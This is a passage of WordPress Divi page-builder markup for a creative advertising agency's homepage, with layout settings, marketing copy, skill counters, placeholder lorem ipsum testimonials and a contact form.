src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||40px|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Why We\" title_text=\"Why-we\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" hover_enabled=\"0\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\" custom_margin=\"-86px|||||\"]<h2><span>Why choose us?</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"||31px|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p><span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>\n[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" alt=\"Packaging Design\" title_text=\"packaging design by what the hell\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/217x434.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" title_text=\"217x434\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" alt=\"Creative graphic designing\" title_text=\"Creative graphic designing\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" alt=\"Packaging Design creative agency\" title_text=\"packaging design creative advertising agency\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\" hover_enabled=\"0\"]<p>We have a dedicated inhouse talent to handle the various aspects of communication and digital advertising. Be it creative writing or eye catching graphic design. Our young and energetic team bring best and creative execution to all the ideas created.</p>\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\" hover_enabled=\"0\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"4.5.2\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" hover_enabled=\"0\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]\n\nLead/Sales Generation Campaign - 77%\n\n[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"4.5.2\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" hover_enabled=\"0\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]\n\nDigital Advertising - 85%\n\n[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\" hover_enabled=\"0\" alt=\"creative services\" title_text=\"creative services\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12-1.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\" alt=\"Best Advertising agency\" title_text=\"best-advertising-agency\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.82\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" 